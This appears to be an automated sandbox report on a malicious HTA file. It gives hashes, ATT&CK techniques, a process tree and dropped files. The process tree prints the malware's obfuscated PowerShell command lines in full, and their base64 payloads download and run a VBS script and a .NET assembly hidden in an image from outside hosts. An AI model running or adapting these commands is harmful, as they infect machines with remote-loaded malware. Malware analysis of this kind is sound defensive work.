42b3442bc675f7ff95d660935ea8756710fea99551b1d614f2e8b7db739d72a0

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
28-01-2025 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta
Size

252KB
MD5

9fb8a902f8fed32164687eacbc011faa
SHA1

7e2c1b3241c142946709366d053a0a458dcb6b3f
SHA256

42b3442bc675f7ff95d660935ea8756710fea99551b1d614f2e8b7db739d72a0
SHA512

3de9bde1a8ed6d6b974e541241009e2c18ed74d9ce777129d59a0c5df0306a6494d02b212a651769ce523b8d14da20f1f8d2774508e6979daeee79e883d2c4aa
SSDEEP

768:PD2dFEfY7Xw8LcGdgtF/UT1JrXkUBDbzuJqAakf4vlOGd5cqjk1FJZuO+yIF9OQ5:NzNtyht97

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2904	powershell.exe
6	1380	powershell.exe
8	1380	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2680	cmd.exe
2904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1380	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2904	powershell.exe
1380	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 2680	2712	mshta.exe	28
PID 2712 wrote to memory of 2680	2712	mshta.exe	28
PID 2712 wrote to memory of 2680	2712	mshta.exe	28
PID 2712 wrote to memory of 2680	2712	mshta.exe	28
PID 2680 wrote to memory of 2904	2680	cmd.exe	30
PID 2680 wrote to memory of 2904	2680	cmd.exe	30
PID 2680 wrote to memory of 2904	2680	cmd.exe	30
PID 2680 wrote to memory of 2904	2680	cmd.exe	30
PID 2904 wrote to memory of 2544	2904	powershell.exe	31
PID 2904 wrote to memory of 2544	2904	powershell.exe	31
PID 2904 wrote to memory of 2544	2904	powershell.exe	31
PID 2904 wrote to memory of 2544	2904	powershell.exe	31
PID 2544 wrote to memory of 2576	2544	csc.exe	32
PID 2544 wrote to memory of 2576	2544	csc.exe	32
PID 2544 wrote to memory of 2576	2544	csc.exe	32
PID 2544 wrote to memory of 2576	2544	csc.exe	32
PID 2904 wrote to memory of 264	2904	powershell.exe	34
PID 2904 wrote to memory of 264	2904	powershell.exe	34
PID 2904 wrote to memory of 264	2904	powershell.exe	34
PID 2904 wrote to memory of 264	2904	powershell.exe	34
PID 264 wrote to memory of 1380	264	WScript.exe	35
PID 264 wrote to memory of 1380	264	WScript.exe	35
PID 264 wrote to memory of 1380	264	WScript.exe	35
PID 264 wrote to memory of 1380	264	WScript.exe	35

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c powERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lunneqyl.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2544
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51D8.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2576
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetogetmebestthingswithgreatnbestthingsigotfromever.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:264
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnACMAeAAjAC4AcwBnAG4AaQBoACMAIwBzAGUAYgBlAG0AZQBzAG8AcgBmAG8AbABsAGkAawBzAGUAYwBpAG4ALwBvAGMAbgAvAHAAcABtAGEAeAAvADQANQAuADYANAAyAC4ANQAyADEALgA1ADMAMQAvAC8AOgBwACMAIwBoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMAAwADgAMAA5ADgALwBlAGYAcABxAG4AdgBoADgAeAB4AG4AMQBjAGQAMwB2AHEAbABiAGQALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAsACcAdABvAHIAcgBvAG4AdABlAHMAJwAsACcAdgBiAHMAJwAsACcAMQAwADAAJwAsACcAMQAnACwAJwBwAHMAZQB1AGQAbwBtAGUAcgB5ACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab6663.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES51D9.tmp

Filesize
1KB

MD5
4694dd8217dff63ce1e2c75dab04c56b

SHA1
e66df783e63f0df28d149d56a17547ff6d32b546

SHA256
63c9e34573d440c6f8ef4025be2452b44359e693d839b74f5795ba82865e7d3c

SHA512
32f2fd9526e0062224e2bf44637f9a51802c0371211b5909d3c53be74ea1c4afcb1c1a923de6a270c6bd11b41bdcf7a96b267cab44a1465c4fa6057999cf4f79

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6676.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lunneqyl.dll

Filesize
3KB

MD5
0846b957e43018ab9ec7053cfea40468

SHA1
f2dc45b3275befc61dc0acbb4d7a60fb0bea7543

SHA256
c37a6a4b0feb8476a136980a9c7b6aa4be305b73ef423e85d1f68b5e11ca8c8d

SHA512
6e52fb65b183ec8f47f49600a7436712d1dc8b98cf559d6b84dc3620adff6d22c9bc7450c92203c1f8051761bc0e6e781be771a4dfd899bd959063b566d5a173

Download Submit
C:\Users\Admin\AppData\Local\Temp\lunneqyl.pdb

Filesize
7KB

MD5
787d8068c36f2efa45e0938aca49c62c

SHA1
6598d72e44c274f17c3054b90d1e262c47cebf2f

SHA256
87159925eeeb98938eac9f470a50a8cc0ae18399aa00ad22790462a68210fdb2

SHA512
6725fdf7ca0cc00ce8c3f725bf6b7ba66a66a32db1c131448d6d499b62ce89ac249d2bc2962a49784474ddb293ab15a074db8b7e4b57081e0b98be14626457b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d21a72564a1edb042301a48d17d33ae1

SHA1
7a0d3747e77e79f8d6b5ebf3d482824dd825be0a

SHA256
f46f4b5ed4c8b50b37db02737c30c035ba637b84b8c1313be9557865824f6600

SHA512
d0ad1475017a16489bfc13ec64b8d554070b9b65624c6fc8516dd4662faa4d5881a80f8daa78a63386e1785a3780d9d923b942dd4947d0c14e70e70e71ba0506

Download Submit
C:\Users\Admin\AppData\Roaming\nicetogetmebestthingswithgreatnbestthingsigotfromever.vbs

Filesize
236KB

MD5
ff09c5a85cbd9857d9421bc214ec2fe1

SHA1
074bf8a3172008654a2541b851bf4590cd5ef216

SHA256
8c8eea1183ab058182154e705f9a518e4950cbd9b7de8c787e5e943f57aee3ca

SHA512
1a7769ba52d3bc4ecaf7d935656af12bf54f1b4f2bcf8dea9c9c50d6ea7dc261fb45f91ab7a1ff9e186b6db0df3330ca2ccfa66ed4811f4acbb07f980663f3eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC51D8.tmp

Filesize
652B

MD5
16e013644fd235049ed1b170ddbfbc49

SHA1
23e47b97f4ef6f5c4dd5e32bc795fb58326c4216

SHA256
bc38a708a444408311b62d555afa063d5dbf4e3d67e8c473a57bb0ad5f0fc2b6

SHA512
f1cd7eca8a18ccb97b99ea5b8d0627bcad3b6e9db56687abf454da09cdf7ebea865cd6211ad56aa9c8c233eeeff6857ac15181ca9cc8835676789c7d48e8fd23

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lunneqyl.0.cs

Filesize
482B

MD5
1f56a0f3efea0531ce22c4a0338cbf36

SHA1
4c802df944c3a34b94a85ce2211b2a022cbdd90c

SHA256
70ea60da378dd321ba63296b8ec869bace7f330f2d32a0113368bd1bf62976a7

SHA512
8bcca67defcc801d095ae338890e521b13b6fed91861b9584b4af3a130e3edac1f06b49ec403cab61e9b5e9137280501503f10cc5a8ffc3cc93a1d759b60649a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lunneqyl.cmdline

Filesize
309B

MD5
7121babb16205ce7feb6d870e9105757

SHA1
ecce88dbfc6f3ab4ec72aa94d23ad1bfe0fd76cb

SHA256
0f0016fdebdaab2b07ccb4115cf978b232d2220b3419a59ef23ebc0efb54570c

SHA512
f897e5c6625742b4812f52e2e0390a99a85fa069bb4d98da87a81080e9fd8b9b1fe84adf1a879cd17c111551b703da474b5d9d88bfce2206cde9311eb124e32d

Download Submit
memory/2712-0-0x0000000003B50000-0x0000000003B70000-memory.dmp

Filesize
128KB

Download